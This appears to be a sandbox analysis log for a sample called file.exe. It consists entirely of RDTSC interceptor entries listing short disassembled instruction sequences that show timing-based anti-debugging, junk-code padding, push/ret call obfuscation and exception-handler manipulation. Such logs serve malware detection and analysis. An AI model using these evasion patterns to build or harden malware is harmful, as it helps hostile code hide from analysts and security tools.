Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2FC second address: 93B300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 96673C second address: 966741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966741 second address: 96674C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7CC902C406h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A69 second address: 966A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE32h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966A83 second address: 966A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966BC8 second address: 966BDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F7CC8D8AE2Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966BDA second address: 966BFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F7CC902C406h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7CC902C416h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9671E8 second address: 9671EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9675DA second address: 9675DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967773 second address: 9677C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F7CC8D8AE26h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007F7CC8D8AE2Ah 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F7CC8D8AE38h 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007F7CC8D8AE26h 0x00000026 jmp 00007F7CC8D8AE39h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93635D second address: 93637E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jbe 00007F7CC902C406h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F7CC902C40Bh 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967A6B second address: 967A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7CC8D8AE26h 0x0000000d jmp 00007F7CC8D8AE30h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967A88 second address: 967A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968173 second address: 968197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F7CC8D8AE26h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F7CC8D8AE2Dh 0x00000012 popad 0x00000013 pushad 0x00000014 jno 00007F7CC8D8AE26h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9682FB second address: 968308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7CC902C406h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96845D second address: 968476 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jg 00007F7CC8D8AE3Ah 0x00000011 jl 00007F7CC8D8AE2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F059 second address: 96F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F05D second address: 96F061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F5C2 second address: 96F61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jbe 00007F7CC902C421h 0x00000011 js 00007F7CC902C41Bh 0x00000017 jmp 00007F7CC902C415h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jnl 00007F7CC902C411h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7CC902C415h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E573 second address: 96E578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F700 second address: 96F705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973FE3 second address: 973FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973FEA second address: 973FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976ABA second address: 976AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97714E second address: 977153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9777B6 second address: 9777DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7CC8D8AE28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F7CC8D8AE35h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977BBE second address: 977BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977C77 second address: 977CB4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7CC8D8AE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7CC8D8AE28h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2202h] 0x0000002d push eax 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978CC4 second address: 978CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979C2B second address: 979CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F7CC8D8AE2Ch 0x0000000c jo 00007F7CC8D8AE26h 0x00000012 popad 0x00000013 push eax 0x00000014 push esi 0x00000015 jmp 00007F7CC8D8AE38h 0x0000001a pop esi 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D1B42h], ecx 0x00000022 push 00000000h 0x00000024 mov esi, edi 0x00000026 mov di, 4700h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F7CC8D8AE28h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov esi, 019834A0h 0x0000004b jmp 00007F7CC8D8AE34h 0x00000050 js 00007F7CC8D8AE2Ah 0x00000056 mov si, BD95h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e je 00007F7CC8D8AE26h 0x00000064 jmp 00007F7CC8D8AE37h 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B148 second address: 97B14E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98059A second address: 9805A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7CC8D8AE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9805A4 second address: 9805B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7CC902C406h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9805B2 second address: 9805C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E56E second address: 97E572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9825D1 second address: 9825DB instructions: 0x00000000 rdtsc 0x00000002 je 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9825DB second address: 9825EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7CC902C40Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9825EE second address: 982659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, BFBBh 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov esi, 0EF5AE18h 0x00000017 mov bh, ah 0x00000019 popad 0x0000001a movzx edi, di 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F7CC8D8AE28h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xor bx, BC00h 0x0000003e xchg eax, esi 0x0000003f jg 00007F7CC8D8AE34h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F7CC8D8AE31h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98349F second address: 9834A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9834A3 second address: 98351E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F7CC8D8AE28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D2879h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F7CC8D8AE28h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a pushad 0x0000004b mov dl, ah 0x0000004d sub ax, 808Ch 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F7CC8D8AE38h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984461 second address: 984465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98366C second address: 983672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984465 second address: 9844E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F7CC902C408h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jc 00007F7CC902C410h 0x0000002e jmp 00007F7CC902C40Ah 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F7CC902C408h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f jmp 00007F7CC902C40Dh 0x00000054 push 00000000h 0x00000056 mov edi, dword ptr [ebp+122D2CACh] 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983672 second address: 983676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983676 second address: 983689 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7CC902C406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983750 second address: 983754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98467D second address: 984681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983754 second address: 983762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F7CC8D8AE26h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984681 second address: 98468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986741 second address: 986757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7CC8D8AE2Ch 0x0000000a jl 00007F7CC8D8AE26h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987431 second address: 9874A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7CC902C406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jnc 00007F7CC902C408h 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F7CC902C408h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f or dword ptr [ebp+12461261h], ebx 0x00000035 push 00000000h 0x00000037 jmp 00007F7CC902C415h 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+124697FDh], edx 0x00000044 jl 00007F7CC902C408h 0x0000004a mov edi, ecx 0x0000004c xchg eax, esi 0x0000004d jmp 00007F7CC902C40Dh 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986757 second address: 986760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98468D second address: 98473D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 jmp 00007F7CC902C419h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 xor dword ptr [ebp+122D2CB1h], edi 0x0000001a mov ebx, dword ptr [ebp+122D282Dh] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F7CC902C408h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 push edi 0x00000042 mov ebx, dword ptr [ebp+122D2905h] 0x00000048 pop ebx 0x00000049 mov eax, dword ptr [ebp+122D1685h] 0x0000004f xor edi, 27EE4518h 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007F7CC902C408h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 00000016h 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 add di, 41C2h 0x00000076 push eax 0x00000077 jno 00007F7CC902C421h 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007F7CC902C413h 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9874A5 second address: 9874B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F7CC8D8AE2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988442 second address: 98844F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7CC902C406h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98844F second address: 988460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F7CC8D8AE26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A31D second address: 98A321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B227 second address: 98B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F7CC8D8AE28h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 clc 0x00000024 mov bx, 997Dh 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b mov dword ptr [ebp+1247AE19h], eax 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D2AB1h] 0x0000003a xchg eax, esi 0x0000003b jmp 00007F7CC8D8AE2Dh 0x00000040 push eax 0x00000041 pushad 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B279 second address: 98B282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989648 second address: 98964C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98964C second address: 989652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98C300 second address: 98C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E092 second address: 98E0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7CC902C413h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EFEC second address: 98EFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9900B4 second address: 990129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C414h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, cx 0x00000016 mov edi, dword ptr [ebp+122D330Eh] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov di, 89F5h 0x00000027 mov eax, dword ptr [ebp+122D0BE5h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F7CC902C408h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D195Dh], ebx 0x0000004d push FFFFFFFFh 0x0000004f push esi 0x00000050 or edi, 23D9B279h 0x00000056 pop edi 0x00000057 push eax 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932CF3 second address: 932CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7CC8D8AE26h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932CFE second address: 932D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997AF second address: 9997B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997B3 second address: 9997BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997BB second address: 9997C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9998F9 second address: 9998FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9998FF second address: 999926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7CC8D8AE31h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7CC8D8AE2Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FAEA second address: 99FAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99FAF0 second address: 99FB15 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7CC8D8AE28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F7CC8D8AE2Eh 0x00000011 jp 00007F7CC8D8AE28h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
